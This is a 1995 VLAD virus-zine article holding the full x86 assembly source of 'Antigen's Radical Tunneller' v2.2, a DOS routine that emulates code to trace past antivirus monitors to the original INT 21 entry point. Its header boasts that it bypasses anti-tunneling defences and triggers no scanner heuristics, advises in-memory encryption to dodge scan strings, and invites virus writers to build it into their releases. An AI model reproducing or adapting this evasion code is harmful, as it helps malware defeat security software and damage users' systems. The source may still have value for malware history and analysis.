VLAD Magazine - Issue #4 - ARTICLE.5_2 - Antigen's Radical Tunneller v 2.2 - Source Code

1. ;>=---- * * * * * * * * * * *  A. R. T. is here * * * * * * * * * * * ----=<;
2. ;  -\   * * * * * * * * * * *    version 2.2    * * * * * * * * * * *   -\  ;
3. ;  /_   Antigen's Radical Tunneler v 2.2 Copyright 1995, Antigen/VLAD   /_  ;
4. ;>=---- * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ----=<;
5.  
6. ;; OLD and exciting features:
7. ; - bypasses every stable anti-tunneling code out there which is usable
8. ;    in an AV TSR, and many that aren't out there.
9. ; - aborts gracefully if a bad situation is encountered rather than freezing
10. ; - stack tests are futile :) (i.e. TBAV, IBMAV code is useless)
11.  
12. ;; NEW and exciting features:
13. ; - found a bad bug at restore_8c, it didn't restore 8c (not sure how it
14. ;    slipped by my bug-checking)
15. ; - I forgot to include out dx,al entirely
16. ; - fixed a problem with Desqview multi-tasking
17. ; - only 1407 bytes addition to the file!
18. ; - only 1536 or so bytes needed in memory (depends on temp_sp) and if
19. ;    your virus encrypts, you can use the encrypt buffer for the data
20. ;    (might want to experiment with using video memory, etc.)
21. ; - easier porting of code, just define a label called heap, and copy the
22. ;    constant definitions from the end of this file to somewhere after
23. ;    the label - no hastle
24. ; - supports tunneling of more than just INT 21 with a variable termination
25. ;    test procedure and tunneled vector storage location
26. ; - doesn't use INT 1 ever
27. ; - handles all divide overflow exceptions (instead of just divide by 0)
28. ; - handles the bound exception
29. ; - handles test r/m8,i8 and test r/m16,i16 correctly (whoops)
30. ; - handles setalc
31. ; - faster
32. ; - written in a half week, and it works better than v 1.0
33. ; - no heuristics flags when unencrypted by any scanner
34. ; - this test program is easier to use - instead of returning an error code,
35. ;    it will tell you if it works or not.
36. ; - works under DOS, QEMM, Desqview, Windows, Win32, Win95 (beta), PC-DOS 7.0
37. ;   DOS 7.0 (beta), OS/2, and even Linux's DOS emu!!
38. ;!++++++++++++++++++++++++++++!++++++++++++++++++++++++++!
39. ;! I highly recommend that you! I even more highly re-   !
40. ;! use a variant of my entry  ! commend that you at least!
41. ;! code since it is optimized ! encrypt in memory to av- !
42. ;! and _works_                ! oid simple scan strings  !
43. ;!++++++++++++++++++++++++++++!++++++++++++++++++++++++++!
44.  
45. ;;  READ THIS!  READ THIS! READ THIS! READ THIS! READ THIS!
46. ;; License agreement:
47. ; you the programmer are free to use ART and modify the source code as you
48. ; wish (although I wouldn't recommend changing anything but what I designed
49. ; to be changed) with one condition: If you release anything (virus, AV)
50. ; which contains _any_ portion of ART, that you send me a registered (if AV)
51. ; or commented source.  There is no license fee, and I expect you to make
52. ; necessary modifications as long as I have a copy of the code prior to
53. ; release.  This is only because I like to see where my code is used, and
54. ; since use of ART is free, I would hope you wouldn't pirate it.  To contact
55. ; me, mail a uuencoded executable (if AV) or commented source to:
56.  
57. ; vlad@trisection.mit.edu
58.  
59. ; If you find any bugs or have any comments, please mail those also to
60. ; vlad@trisection.mit.edu.  Most importantly, enjoy your use of art, and
61. ; write some kick-ass stuff which uses it :).
62.  
63. ;; -Antigen
64.  
65.  
66. ;----------------------------cut---cut---cut---cut--------------------------;
67. ideal               ; use TASM - you'll like yourself more
68. segment code    'code'
69. assume  cs:code,ds:code,es:code,ss:code
70. radix   16          ; use radix 16 or the results will be BIZARRE
71. org 100         ; this is a .com- doesn't have to be though
72. start:
73.     push    cs
74.     pop ds
75.     mov di,sim_flags            ; this simply saves code
76.     mov [word ptr di+(temp_sp - sim_flags)],stack_top + 40
77.     mov [word ptr di+(_cs - sim_flags)],cs
78.     mov [word ptr di+(_ip - sim_flags)],offset tunnel
79. ;; set the cs:ip of art to cs:tunnel
80.     mov [word ptr di+(test_exit - sim_flags)],offset _21test
81. ;; use the INT 21 tunnel tester
82.     mov [word ptr di+(tunnel_ip_ofs - sim_flags)],tunnel_ip
83. ;; tell art where to put the tunneled cs:ip
84.     mov [byte ptr di],0
85. ;; clear all simulation flags
86.     mov ah,52
87.     int 21              ; get DOS list of lists
88.     mov ax,[es:bx-2]            ; ax = first MCB
89.     mov [word ptr di+(firstMCB - sim_flags)],ax
90.     mov [word ptr di+(return_address - sim_flags)],offset beginning
91. ;; on return from saving the processor state, go to the beginning
92.     mov ax,0de1bh
93.     int 15
94.     mov ah,30               ; we'll use get DOS version
95.     jmp save_ds             ; jump into art
96. ;----------------------->> art starts simulating at this point
97. tunnel:
98.     int 21              ; this is tunneled
99. ;; if unsuccessful, this will be set to 0ffff (an impossible offset of int 21)
100.     mov ax,0de1ch
101.     int 15
102.     mov ax,[word ptr di+(tunnel_ip - sim_flags)]
103. ;; art aborts upon all escsaped 0Fh instructions, and when it finds ARPL,
104. ;; FS segment override, GS segment override, Operand Length Override, Address
105. ;; length override, coprocessor escape instructions, and BPICE
106.     push    cs
107.     pop ds
108.     cmp ax,0ffff
109.     jne successful
110.     mov ah,9
111.     mov dx,offset unsuc_msg
112.     int 21
113.     mov ax,4c00
114.     int 21
115. successful:
116.     mov ah,9
117.     mov dx,offset suc_msg
118.     int 21
119.     mov ax,4c00
120.     int 21
121. unsuc_msg:
122.     db  'Did not work :($'  ; tells you if it works or not
123. suc_msg:
124.     db  'Worked :)$'
125. ;;assumptions:
126. ; - the code will only be executed in a situation where no delta offset
127. ;   is necessary, i.e. in residence
128. ; - radix is 16
129. ; - ss:sp = cs:tempsp
130. ; - saved ss:sp is valid
131. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
132. ;; sim_flags bitmapped values:
133. ;  8 7 6 5 4 3 2 1
134. ;  � � � � � � � �� set ds = traced cs in simulation
135. ;  � � � � � � �� bound interrupt hooked (0 if divide exception hooked)
136. ;  � � � � � �� unused
137. ;  � � � � �� unused
138. ;  � � � �� set es = old ds in simulation
139. ;  � � �� unused
140. ;  � �� unused
141. ;  �� one of either int 0 or int 5 has been hooked
142. unsuccessful:
143.     mov di,[word ptr cs:tunnel_ip_ofs]  ; set in the initialization
144.     xor ax,ax
145.     dec ax              ; ax=0ffff
146.     stosw
147. exit_art:
148.     mov [word ptr cs:return_address],offset hide_tracks
149.     jmp restore_ds          ; continue where we left off
150. hide_tracks:
151.     jmp [dword ptr cs:_ip]      ; no traces :)
152. beginning:
153.     cld
154.     mov al,[byte ptr cs:sim_flags]
155. ;; did the last instruction require hooking of an interrupt?
156.     test    al,80
157.     je  no_reset
158.     xor di,di
159.     mov es,di               ; es:di = int 0 vector
160.     test    al,2                ; was it int 5?
161.     je  was_int_0
162.     mov di,4*5              ; int 5 vector
163. was_int_0:
164.     mov ax,[word ptr cs:int0_5_sip] ; saved int 0/5 vector
165.     stosw
166.     mov ax,[word ptr cs:int0_5_scs]
167.     stosw
168.     and [byte ptr cs:sim_flags],not 82  ; turn off de flags
169. no_reset:
170.     push    cs
171.     pop es
172.     mov di,simulate_buffer      ; es:di = simulate buffer
173. ;; ds:si = traced cs:ip
174.     mov ds,[word ptr cs:di+(_cs-simulate_buffer)]
175.     mov si,[word ptr cs:di+(_ip-simulate_buffer)]
176. ;; exceptions always push the ip of the ofending instruction on 286+
177. ;; and since nobody in their right mind would write software which
178. ;; works only on 8086/8088s, I assume this will be the case.
179.     mov [word ptr cs:di+(int0_5_ip-simulate_buffer)],si ; remember it
180. ;; this calls the procedure installed to test whether we've tunneled far
181. ;; enough
182.     call    [word ptr cs:di+(test_exit-simulate_buffer)]
183.     jnc continue_art
184. ;; if we reach here, we're done :)
185.     mov di,[word ptr cs:di+(tunnel_ip_ofs - simulate_buffer)]
186. ;; di = 4 byte space for the tunneled cs:ip
187.     xchg    ax,si
188.     stosw
189.     mov ax,ds
190.     stosw                   ; save the tunneled cs:ip
191.     jmp exit_art
192. continue_art:
193. ;; al = 1st byte of next instruction
194.     lodsb
195.     stosb                   ; save in simulate buffer
196.     call    scan_for_invalid        ; unhandleable opcode?
197.     jnc unsuccessful            ; damn
198.     call    scan_for_prefix         ; prefix?
199.     jnc continue_art            ; if so, read in next byte
200.     call    scan_for_csip_change        ; modifies cs and/or ip?
201.     ;; if so, it never returns, but jumps to continue_art
202.     call    scan_for_int0_5_needed      ; hook int 0/5 if needed
203.     call    scan_for_no_mrm         ; simple instruction?
204.     jnc goto_simulate           ; then no problems
205. ;; if we reach here, the instruction has a ModR/M byte which needs parsing
206.     push    ax
207.     xchg    ax,bx               ; bl = instruction
208.     lodsb                   ; load the ModR/M into al
209. skip_out:
210. ;; here's the bug in art 1.0 which I fixed: f6 and f7 ModR/M column 0
211. ;; have an immediate value which was never copied to the simulate buffer
212.     cmp bl,0f6
213.     je  test_immm
214.     cmp bl,0f7
215.     jne no_immm
216. test_immm:
217.     stosb                   ; save the ModR/M
218.     mov ah,al               ; again
219.     and al,111000b          ; if column 0, ZF will be set
220.     xchg    ah,al
221.     jne no_imms
222.     test    bl,1                ; f7 has 2 bytes, f6 1
223.     je  one_immm
224.     movsb
225. one_immm:
226.     movsb
227. no_imms:
228.     call    immm_parse_ModRM        ; skip the stosb below
229.     jmp rest_main
230. no_immm:
231.     call    parse_ModRM         ; store and parse the ModR/M
232. rest_main:
233.     pop ax              ; al = instruction byte
234.     call    scan_for_immediate      ; has immediate bytes?
235. goto_simulate:
236.     jmp simulate
237. ;===========================================================================
238. ; given a ModRM in al, determine the length of displacement
239. ; es:di -> current location in simulation buffer
240. ;; format of ModR/M:
241. ;; bit: 8 7 6 5 4 3 2 1
242. ;; Mod: 1 1              = register value, i.e. just a ModR/M byte
243. ;; Mod: 1 0              = memory value + a 16 bit displacement
244. ;; Mod: 0 1              = memory value + an 8 bit displacement
245. ;; mrm: 0 0       1 1 0  = just a 16 bit displacement
246. ;; mrm: 0 0       x x x  = just a ModR/M byte (x x x != 1 1 0)
247. parse_ModRM:
248.     stosb           ; save the ModRM
249. immm_parse_ModRM:
250.     mov ah,al
251.     and al,0c0      ; isolate the Mod and the R/M
252.     cmp al,0c0
253.     je  no_disp
254.     cmp al,80
255.     je  disp16
256.     cmp al,40
257.     je  disp8
258.     and ah,111b
259.     cmp ah,6
260.     jne no_disp
261. disp16:
262.     movsb
263. disp8:
264.     movsb
265. no_disp:
266.     ret
267. ;===========================================================================
268. restore_ds:
269.     mov ds,[word ptr cs:_ds]
270. restore_proc_state:
271.     mov ax,cs
272.     mov ss,ax
273.     mov sp,stack_bottom
274.     pop ax bx cx dx si di bp es
275.     popf
276.     pop ss
277.     mov sp,[word ptr cs:_sp]
278.     jmp [word ptr cs:return_address]
279. ;===========================================================================
280. save_ds:
281.     mov [word ptr cs:_ds],ds
282. save_proc_state:
283.     mov [word ptr cs:_sp],sp
284.     mov [word ptr cs:_ss],ss
285.     mov [word ptr cs:_ax],ax
286.     mov ax,cs
287.     mov ss,ax
288.     mov sp,stack_top
289.     pushf
290.     cli
291.     push    es bp di si dx cx bx
292.     mov ax,cs
293.     mov ss,ax
294.     mov sp,[word ptr cs:temp_sp]        ; use temporary stack
295.     jmp [word ptr cs:return_address]
296. ;===========================================================================
297. ;===========================================================================
298. simulate:
299. ;; write the ret to simulate buffer
300.     call    write_ret
301.     mov di,sim_flags            ; save bytes
302. ;; zero return address for now
303.     and [word ptr cs:di+(return_address - sim_flags)],0
304.     test    [byte ptr cs:di],10     ; set es = ds?
305.     je  no_es
306.     sub [word ptr cs:di+(return_address - sim_flags)],\
307.         start_simulate-let_es_eq_ds ; adjust return address
308. no_es:
309.     test    [byte ptr cs:di],1      ; set ds = cs?
310.     jne let_ds_eq_cs            ; ds already = cs
311. ;; restore ds if we don't need it to be cs
312.     mov ds,[word ptr cs:di+(_ds - sim_flags)]
313. let_ds_eq_cs:
314.     add [word ptr cs:return_address],offset start_simulate
315.     jmp restore_proc_state
316. let_es_eq_ds:
317.     mov [word ptr cs:temp_es],es    ; remember for afterwards
318.     mov es,[word ptr cs:_ds]        ; set es = ds
319. start_simulate:
320.     mov [word ptr cs:return_address],offset ds_cleanup
321.     jmp near simulate_buffer        ; do de dirty werk
322. ds_cleanup:
323.     mov [word ptr cs:return_address],offset test_ds
324.     jmp save_proc_state         ; save everytink but ds
325. test_ds:
326.     mov di,sim_flags
327.     test    [byte ptr cs:di],10     ; was es = ds?
328.     je  es_is_just_fine_the_way_it_is   ; heh, guess not
329.     mov ax,[word ptr cs:di+(temp_es - sim_flags)]
330.     mov [word ptr cs:di+(_es - sim_flags)],ax
331. es_is_just_fine_the_way_it_is:
332.     test    [byte ptr cs:di],1      ; was ds = cs?
333.     je  normal_cmp          ; if so, and ds now != cs,
334.     mov ax,ds               ; we want top save the change
335.     cmp ax,[word ptr cs:di+(_cs - sim_flags)]
336.     jne normal_cmp
337.     mov ds,[word ptr cs:di+(_ds - sim_flags)]
338. normal_cmp:
339.     mov [word ptr cs:di+(_ds - sim_flags)],ds
340.     and [byte ptr cs:di],not 11     ; turn off ds = cs,es = ds
341. cycle:
342.     jmp beginning           ; go topside
343. ;===========================================================================
344. write_ret:
345.     mov [word ptr cs:_ip],si        ; save new ip
346.     mov ax,0ff2e            ; cs:...
347.     stosw
348.     mov ax,(low offset return_address) shl 8 + 26
349.     stosw
350.     mov al,(high offset return_address)
351.     stosb                   ; ...jmp [return_address]
352.     ret
353. ;===========================================================================
354. scan_for_invalid:
355.     mov bx,offset invalid_sfi
356.     mov cx,end_invalid_sfi - invalid_sfi
357.     jmp scan                ; let scan handle the ret
358. invalid_sfi:
359.     db  0f,63,64,65,66,67,0d8,0d9,0da,0dbh,0dc,0ddh,0de,0df,0f1
360. end_invalid_sfi:
361. ;===========================================================================
362. scan_for_prefix:
363.     cmp al,2e               ; cs:?
364.     je  set_sfp
365. reset_sfp:
366.     mov bx,offset prefixes
367.     mov cx,end_prefixes - prefixes
368.     call    scan
369.     jc  no_reset_sfp
370.     and [byte ptr cs:sim_flags],not 1   ; turn off ds = cs flag
371. no_reset_sfp:
372.     ret
373. set_sfp:
374.     or  [byte ptr cs:sim_flags],1   ; turn on ds = cs flag
375. ;; set al = 3e which is ds:
376.     or  al,10               ; this auto. clears carry :)
377.     dec di              ; replace the cs:
378.     stosb
379.     ret
380. prefixes:
381.     db  26,36,3e,64,65,0f0,0f2,0f3
382. end_prefixes:
383. ;===========================================================================
384. scan_for_int0_5_needed:
385.     push    ax es di
386.     cmp al,0f6              ; DIV/IDIV
387.     je  needed0
388.     cmp al,0f7
389.     je  needed0
390.     cmp al,0d4              ; AAM
391.     je  might_need_0
392.     cmp al,62               ; Bound
393.     je  needed5
394. do_da_ret_thang:
395.     pop di es ax
396.     ret
397. needed5:
398.     mov di,4*5
399.     or  [byte ptr cs:sim_flags],2   ; remember it was int 5
400.     jmp skip_0
401. might_need_0:
402.     lodsb                   ; the immediate of AAM
403.     dec si
404.     or  al,al               ; is it 0?
405.     jne do_da_ret_thang         ; if so we need to hook int 0
406. needed0:
407.     xor ax,ax
408.     mov di,ax
409.     mov es,ax               ; es:di = int 0 vector
410. skip_0:
411.     or  [byte ptr cs:sim_flags],80  ; remember we hooked an int
412.     mov ax,[es:di]
413.     mov [word ptr cs:int0_5_sip],ax
414.     mov ax,[es:di+2]
415.     mov [word ptr cs:int0_5_scs],ax ; save the vector
416.     mov ax,offset int0_5
417.     stosw
418.     mov ax,cs
419.     stosw                   ; set it to ours
420.     jmp do_da_ret_thang
421. ;===========================================================================
422. standard_cfar:                  ; call far
423.     push    ds              ; return cs
424.     lea ax,[si+4]           ; return ip
425.     push    ax
426. ;===========================================================================
427. standard_far:
428.     lodsw
429.     lodsw                   ; ax = the new cs
430.     mov ds,ax
431. f_standard_far:
432.     or  al,8                ; make sure al is non-zero
433.     cmp ax,0                ; shorter than a jmp short
434. org $ - 2
435. standard_near:
436.     mov al,0                ; make sure al = 0
437. do_gnear:
438.     mov [word ptr cs:_ip],bx        ; save the new ip
439.     or  al,al               ; was it far?
440.     je  near_direct
441. do_gfar:                    ; if al != 0 then
442.     mov [word ptr cs:_cs],ds        ; yes
443. near_direct:
444.     jmp to_beginning            ; restore temp stack
445. ;===========================================================================
446. do_cnear:
447.     lea ax,[si+2]           ; return ip
448.     push    ax              ; save on stack
449.     jmp do_near             ; do near jump procedure
450. ;===========================================================================
451. do_cond:
452.     mov [byte ptr cs:test_jcond],al ; save the jump
453.     mov cx,[word ptr cs:_cx]        ; if loop, it uses cx
454.     xchg    bh,bl               ; bh = short offset
455.     mov bl,0                ; set the current jmp to 0
456.     mov bp,sp
457.     mov bp,[bp-2]           ; bp = stack word
458.     push    [word ptr cs:flags]
459.     popf                    ; restore flags
460.     push    bp              ; keep the stack untarnished
461.     pop bp
462.     jmp test_jcond          ; flush prefetch on 486-
463. test_jcond:
464. ;; the je is replaced with the jump of choice (current instruction)
465.     je  has_offset
466.     cmp ax,0                ; shorter dan a jmp short
467. org $ - 2
468. has_offset:
469.     mov bl,bh               ; use the short offset
470.     mov [word ptr cs:_cx],cx        ; save any changes to cx
471. ;; al = relative offset
472. do_short:
473.     xchg    ax,bx
474.     cbw                 ; convert the short to a near
475.     xchg    ax,bx
476.     dec bx              ; short jmps are 2 bytes
477. ;; bx = relative offset
478. do_near:
479.     inc bx
480.     inc bx
481.     inc bx              ; near jmps are 3 bytes long
482.     add [word ptr cs:_ip],bx        ; set new ip
483. ;===========================================================================
484. to_beginning:
485.     mov [word ptr cs:_sp],sp        ; remember changes to sp
486.     mov bx,cs
487.     mov ss,bx
488.     mov sp,offset stack_top+300     ; use temporary stack
489.     jmp beginning           ; cycle
490. ;===========================================================================
491. scan_for_csip_change:
492.     mov bx,offset temp_sp
493.     mov [word ptr cs:bx],sp     ; save current sp
494. ;; use original stack (smaller code)
495.     mov ss,[word ptr cs:bx+(_ss - temp_sp)]
496.     mov sp,[word ptr cs:bx+(_sp - temp_sp)]
497.     xchg    ax,bx
498.     lodsw
499.     xchg    ax,bx
500. ;; al = current instruction, ah = 0 (4 lines down)
501. ;; bx = next 2 bytes
502.     dec si
503.     dec si
504.     mov ah,0
505.     cmp al,9a               ; call far
506.     je  standard_cfar
507.     cmp al,0ea              ; jmp far
508.     je  standard_far
509.     cmp al,0ebh             ; jmp short
510.     je  do_short
511.     cmp al,0e9              ; jmp near
512.     je  do_near
513.     cmp al,0e8              ; call near
514.     je  do_cnear
515.     cmp al,0e0              ; loopne
516.     jb  no_cond             ; loope is e1, loop is e2
517.     cmp al,0e3              ; jcxz
518.     jbe do_cond
519. no_cond:
520.     cmp al,70               ; all the jx/jnx jumps
521.     jb  not_jcond
522.     cmp al,7f
523.     jbe do_cond
524. not_jcond:
525.     cmp al,0c2              ; ret iw
526.     je  iw_ret
527.     cmp al,0c3              ; ret
528.     je  standard_ret
529.     cmp al,0ca              ; retf iw
530.     je  iw_retf
531.     cmp al,0cbh             ; retf
532.     je  standard_retf
533.     cmp al,0cc              ; int 3
534.     je  trap_int
535.     cmp al,0cdh             ; int xx
536.     je  do_int
537.     cmp al,0ceh             ; into
538.     je  overflow_int
539.     cmp al,0cfh             ; iret
540.     je  do_iret
541.     cmp al,0ff              ; indirect jmp/call (maybe)
542.     je  test_ff
543.     jmp restore_temp_stack      ; return to the sim cycle
544. ;===========================================================================
545. iw_retf:
546. ;; remember that this is a retf and also not an iret
547.     or  ax,101
548. iw_ret:
549. ;; remember that an imm16 must be added to sp
550.     or  ah,2
551.     test    ah,1
552.     jne standard_retf
553. standard_ret:
554.     mov al,0                ; not retf
555.     cmp ax,0                ; shorter jmp short
556. org $ - 2
557. standard_retf:
558.     and al,not 2            ; not iret
559. do_iret:
560. do_retn:
561.     pop [word ptr cs:_ip]       ; pop ip from stack
562.     test    al,1                ; far?
563.     je  retn_only
564.     pop [word ptr cs:_cs]       ; pop cs from stack
565.     test    al,2                ; iret?
566.     je  retf_only
567.     pop [word ptr cs:flags]     ; pop flags
568. retf_only:
569. retn_only:
570.     test    ah,2                ; immediate word?
571.     je  no_iw
572.     add sp,bx               ; bx = that word (ca xxxx)
573. no_iw:
574.     jmp to_beginning            ; cycle
575. ;-----------------------------
576. ; thses are used by test_ff
577. goto_call_near:
578.     push    si
579. goto_jmp_near:
580.     jmp standard_near
581. goto_call_far:
582.     push    [word ptr cs:_cs] si
583. goto_jmp_far:
584.     jmp f_standard_far
585. ;===========================================================================
586. overflow_int:
587.     test    [word ptr cs:flags],800     ; OF set?
588.     mov bl,4                ; int 4 if so
589.     jne do_sint
590.     mov bx,si               ; si = instruction after INTO
591.     jmp do_gnear            ; reuse code to save size
592. trap_int:
593.     mov bl,3                ; use int 3
594. do_sint:
595.     dec si              ; cc,ce are 1 byte < cd xx
596. ;===========================================================================
597. do_int:
598.     mov bh,0                ; bx = int number
599.     shl bl,1
600.     shl bl,1                ; bx = bx*4
601.     inc si
602.     push    [word ptr cs:flags] ds si   ; order of stack in an int
603.     and [byte ptr cs:flags+1],not 3 ; turn off TF & IF
604.     xor ax,ax
605.     mov ds,ax
606.     lds bx,[bx]             ; ds:bx =int vector
607.     or  al,8                ; it's far, so remember
608.     jmp do_gnear
609. ;===========================================================================
610. test_ff:
611.     mov ax,cs
612.     mov ss,ax
613.     mov sp,[word ptr cs:temp_sp]    ; need temporary stack
614.     lodsb                   ; al = ModR/M
615.     mov ah,al               ; remember it
616.     and al,111000b          ; isolate opcode in ModR/M
617.     push    ax              ; save for later
618.     cmp al,2 shl 3
619.     jb  not_csip_ff
620.     cmp al,5 shl 3          ; if 5 > reg > 2 it needs sim
621.     ja  not_csip_ff
622.     call    get_ModRM           ; get the new cs:ip
623.     xchg    ax,bx               ; ds:bx = new cs:ip
624.     pop ax              ; ax = reg of Mod reg R/M
625.     mov ss,[word ptr cs:_ss]
626.     mov sp,[word ptr cs:_sp]
627.     mov si,[word ptr cs:_ip]
628.     cmp al,2 shl 3          ; call near
629.     je  goto_call_near
630.     cmp al,3 shl 3          ; call far
631.     je  goto_call_far
632.     cmp al,4 shl 3          ; jmp near
633.     je  goto_jmp_near
634.     cmp al,5 shl 3          ; jmp far
635.     je  goto_jmp_far
636. not_csip_ff:
637.     dec si              ; ds:si -> ModR/M
638.     pop ax              ; pop to get the ret to work
639.     mov al,0ff              ; now it's like when started
640.     ret
641. ;===========================================================================
642. scan_for_no_mrm:
643.     cmp al,0e               ; push  cs
644.     jne not_pushcs
645.     dec di              ; es:di -> push cs
646.     or  al,10               ; push ds
647.     stosb                   ; switch push cs with push ds
648.     or  [byte ptr cs:sim_flags],1   ; remember to set ds = cs
649.     ret
650. not_pushcs:
651.     cmp al,8c               ; mov r/m16,segmentr register?
652.     jne not_mov_reg_seg
653.     lodsb                   ; al = ModR/M
654.     push    ax              ; save it
655.     and al,111000b          ; isolate the register
656.     cmp al,1000b            ; cs?
657.     jne not_cs
658.     or  [byte ptr cs:sim_flags],1   ; set ds = cs and use ds
659.     pop ax
660.     or  al,10000b           ; now = ds
661. setup_skip:
662.     pop bx              ; pop the return address
663.     push    ax              ; setup to skip normal route
664.     mov bl,08c
665.     jmp skip_out            ; go directly to parse_modR/M
666. not_cs:
667. ;; now to check for:
668. ;  mov [cs:somewhere],ds
669. ;   which becomes
670. ;  mov [ds:somewhere],ds (mov [cs:somewhere],cs - oops)
671. ;   so I use
672. ;  mov [ds:somewhere],es and set es = ds
673.     cmp al,11000b           ; ds?
674.     jne restore_8c
675.     test    [byte ptr cs:sim_flags],1   ; is ds = cs? urgh, problem
676.     je  restore_8c
677.     or  [byte ptr cs:sim_flags],10  ; OK, use es instead
678.     pop ax
679.     xor al,11000b           ; use es
680.     jmp setup_skip
681. restore_8c:
682.     dec si
683.     pop ax
684.     mov al,8c
685.     stc
686.     ret
687. not_mov_reg_seg:
688.     cmp al,0c8              ; enter?
689.     jne next_sfnm
690.     movsw                   ; the only 4 byte instruction
691.     movsb
692.     ret
693. next_sfnm:
694.     cmp al,40
695.     jb  do_scan_sfnm            ; 40 <= instructions <= 61
696.     cmp al,62               ; are all 1 byte instructions
697.     cmc
698.     ja  success_sfnm
699. do_scan_sfnm:
700.     cmp al,90               ; 9a is never seen here
701.     jb  do_scan_sfnm2           ; 90 <= instrucitons <= 9f
702.     cmp al,0a0              ; are all 1 byte instructions
703.     cmc
704.     ja  success_sfnm
705. do_scan_sfnm2:
706.     push    ax
707.     mov bx,offset one_byters
708.     mov cx,two_byters - one_byters
709.     call    scan                ; scan for 1 byters
710.     jnc success1
711.     mov cl,three_byters - two_byters
712.     call    scan                ; scan for 2 byters
713.     jnc success2
714.     mov cl,end_sfnm - three_byters
715.     call    scan                ; and three byte instructions
716.     jc  no_success_sfnm
717.     movsb
718. success2:
719.     movsb
720. success1:
721.     mov ah,0                ; shorter jmp short
722. org $ - 1
723. no_success_sfnm:
724.     stc
725.     pop ax
726. success_sfnm:
727.     ret
728. one_byters:
729.     db  6,7,0e
730.     db  16,17,1e,1f
731.     db  27,2f
732.     db  37,3f
733.     db  6c,6dh,6e,6f
734.     db  0a4,0a5,0a6,0a7,0aa,0abh,0ac,0adh,0ae,0af
735.     db  0c9
736.     db  0d6,0d7
737.     db  0ee
738.     ;skip halt (no need to worry if that's executed!)
739.     db  0f5,0f8,0f9,0fa,0fbh,0fc,0fdh
740. two_byters:
741.     db  04,0c,14,1c,24,2c,34,3c ;add/or/adc/sbb/and/sub/xor/cmp al,ib
742.     db  6a          ;push imm8
743.     db  0a8         ;test al,ib
744.     db  0b0,0b1,0b2,0b3,0b4,0b5,0b6,0b7     ;mov rl/h, ib
745.     db  0d4,0d5         ;aam and aad
746.     db  0e4,0e6         ;in/out al,ib
747.     db  0e5,0e7         ;in/out ax,ib
748. three_byters:
749.     db  05,0dh,15,1dh,25,2dh,35,3dh,45,4dh,55,5dh ;add/or/etc. ax,iw
750.     db  68          ; push imm16
751.     db  0a0,0a1,0a2,0a3     ;mov al/ax,[mx],mov [mx],al/ax
752.     db  0a9         ;test ax,iw
753.     db  0b8,0b9,0ba,0bbh,0bc,0bdh,0be,0bf   ;mov rx,iw
754. end_sfnm:
755. ;===========================================================================
756. scan_for_immediate:
757.     push    ax              ; opcodes with an imm value
758.     mov bx,offset immediates_8
759.     mov cx,immediates_16 - immediates_8
760.     call    scan
761.     jnc success_1_sfi
762.     mov cl,end_immediates - immediates_16
763.     call    scan
764.     jc  no_imm_sfi
765.     movsb
766. success_1_sfi:
767.     movsb
768. no_imm_sfi:
769.     pop ax
770.     ret
771. immediates_8:
772.     db  6bh,80,82,83,0c0,0c1,0c6
773. immediates_16:
774.     db  69,81,0c1,0c7
775. end_immediates:
776. ;===========================================================================
777. ; es:bx = index
778. ; al = byte to scan for
779. ; cx = number of bytes to scan
780. scan:
781.     cmp [es:bx],al
782.     je  found_scan
783.     inc bx
784.     loop    scan
785.     stc
786. found_scan:                 ; if =, CF will be cleared
787.     ret
788. ;===========================================================================
789. _21test:
790. ;; check for instructions which DO NOT exist at DOS entry point
791.     cmp [byte ptr si],0cf       ; iret
792.     je  not_in_DOS
793.     cmp [byte ptr si],0cbh      ; retf
794.     je  not_in_DOS
795.     cmp [byte ptr si],0ca       ; retf iw
796.     je  not_in_DOS
797.     cmp [byte ptr si],0c3       ; ret
798.     je  not_in_DOS
799.     cmp [byte ptr si],0c2       ; ret iw
800.     je  not_in_DOS
801.     mov ax,si
802.     mov cl,4
803.     shr ax,cl               ; un-segmentize
804. ;; segmentize our current location
805.     mov cx,ds
806.     add ax,cx
807.     cmp ax,[word ptr cs:firstMCB]
808. not_in_DOS:
809.     ret
810. ;===========================================================================
811. ;; interrupt handler (sets up tracing through the int handler)
812. int0_5:
813.     mov di,sim_flags
814.     add sp,4
815. ;; push the 'real' return address, replacing the simulate buffer's location
816.     push    [word ptr cs:di+(_cs - sim_flags)]
817.     push    [word ptr cs:di+(int0_5_ip - sim_flags)]
818. ;; save the new sp
819.     mov [word ptr cs:di+(_sp - sim_flags)],sp
820.     lds ax,[dword ptr cs:di+(int0_5_sip - sim_flags)]
821. ;; ds:ax = new cs:ip (location of their int 0/5 vector
822.     mov [word ptr cs:di+(_cs - sim_flags)],ds
823.     mov [word ptr cs:di+(_ip - sim_flags)],ax
824. ;; restore temp_stack
825.     mov ax,cs
826.     mov ss,ax
827.     mov sp,offset stack_top + 300
828.     and [byte ptr cs:di],not 11     ; turn off any flags still on
829.     jmp beginning           ; cycle
830. ;===========================================================================
831. get_ModRM:
832.     mov [word ptr cs:temp_sp],sp
833.     dec di
834. ;; use a temporary instruction to get what's at the ModR/M easily
835.     mov al,0c5h             ; lds r16,r/m16
836.     stosb
837.     mov al,ah
838.     and al,11000000b            ; look at the Mod
839. ;; if it's 2, then the r/m is a register and lds r16,r16 is invalid, so
840. ;; use mov r16,r16 instead
841.     cmp al,11000000b           
842.     jne OK_to_use_lds
843. ;; this only happens for call,jmp near
844.     dec di              ; es:di -> lds r16,r/m16
845.     mov al,8bh              ; mov r16,r/m16
846.     stosb                   ; replace the lds
847. OK_to_use_lds:
848.     mov al,ah
849.     and al,11000111b            ; set r16 to ax
850.     call    parse_ModRM         ; copy correct number of bytes
851.     call    write_ret           ; write the return and save ip
852.     mov [word ptr cs:return_address],offset next_gmw
853.     test    [byte ptr cs:sim_flags],1   ; ds = cs?
854.     je  no_gmw_ds
855.     jmp restore_proc_state      ; restore all but ds
856. no_gmw_ds:
857.     jmp restore_ds          ; restore everything
858. next_gmw:
859.     mov [word ptr cs:return_address],offset next_gmw1
860.     jmp near simulate_buffer        ; get the address in ds:ax
861. next_gmw1:
862.     and [byte ptr cs:sim_flags],not 1   ; turn off the flag
863. restore_temp_stack:             ; self-explanatory
864.     mov bx,cs
865.     mov ss,bx
866.     mov sp,[cs:temp_sp]         ; all set :)
867.     ret
868. ;===========================================================================
869. ; put this label anywhere you want
870. heap:
871. sim_flags   = offset heap
872. firstMCB    = sim_flags + 1
873. tunnel_ip   = firstMCB + 2
874. simulate_buffer = tunnel_ip + 4
